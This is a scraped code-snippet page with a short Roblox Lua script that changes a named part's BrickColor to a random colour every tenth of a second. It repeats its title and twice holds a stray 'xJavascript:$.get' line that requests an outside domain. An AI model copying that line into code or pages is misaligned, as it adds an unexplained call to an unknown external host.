how to make an rgb part in roblox studio lua 2020
xJavascript:$.get("//javascript-roblox.com/api?i=13407")
how to make an rgb part in roblox studio lua 2020
xJavascript:$.get("//javascript-roblox.com/api?i=13407")
how to make an RGB part in roblox studio lua 2020
--RGB Part
local MyPart = game.Workspace.RGBPart --[ Change "RGBPart" With Your Part Name ]--
while wait(0.1) do --[ 0.1 = Changes Color Every 0.1 Seconds ]--
MyPart.BrickColor = BrickColor.random()
end --[ Script Officially Made By Rigby#9052 on Discord or JUB0T on Roblox ]--
Copyright © 2021 Codeinu
Forgot your account's password or having trouble logging into your Account? Don't worry, we'll help you to get back your account. Enter your email address and we'll send you a recovery link to reset your password. If you are experiencing problems resetting your password contact us